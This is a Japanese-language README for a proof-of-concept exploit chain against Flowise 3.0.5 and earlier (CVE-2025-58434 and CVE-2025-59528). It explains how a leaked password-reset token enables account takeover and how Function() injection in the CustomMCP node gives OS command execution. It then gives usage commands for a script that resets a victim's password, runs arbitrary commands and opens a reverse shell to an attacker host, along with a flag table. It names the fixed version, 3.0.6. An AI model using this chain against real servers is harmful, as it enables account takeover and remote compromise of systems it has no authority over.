
CVE-2025-58434 と CVE-2025-59528 連鎖 POC
Flowise <= 3.0.5 に影響を与える2つの脆弱性のエクスプロイトチェーン。
パスワードリセット用のエンドポイントは、認証を必要とせずにAPIレスポンス内で有効なパスワードリセットトークンを返します。有効なメールアドレスを知っている攻撃者は、ユーザーの操作なしに任意のアカウントのパスワードをリセットできます。
CustomMCPノードは、ユーザーが制御する入力を、完全なNode.js権限を持つ Function() コンストラクタに直接渡します。有効なAPIキーを持つ認証済みユーザーは、Flowiseプロセスのユーザーとして任意のOSコマンドを実行できます。
修正バージョン: Flowise 3.0.6
pip install requests完全なATOチェーン(パスワードをリセットし、APIキーを要求し、リバースシェルを起動します):
python3 flowise_chain.py -t http://target -e [email protected]
RCEのみ(既にAPIキーを持っている場合):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
既存のキーを使用したリバースシェル:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| フラグ | 説明 |
|---|---|
-t, --target | ターゲットURL |
-e, --email | ターゲットアカウントのメールアドレス(ATOチェーンをトリガー) |
--api-key | APIキーを直接指定(ATOをスキップ) |
-c, --command | 実行するコマンド |
--lhost | リバースシェル用の攻撃者IP |
--lport | リバースシェル用の攻撃者ポート(デフォルト: 4444) |
--new-password | リセット時に設定するパスワード(デフォルト: Pwn3d!2026) |
-k, --insecure | TLS検証をスキップ |
Flowise 3.0.5の仕様により、パスワードリセットAPIエンドポイントは、ログインエンドポイントが受け付ける認証情報をすぐには更新しません。スクリプトはリセット後に一時停止し、手動でUIにログインして /apikey からAPIキーをコピーするように促します。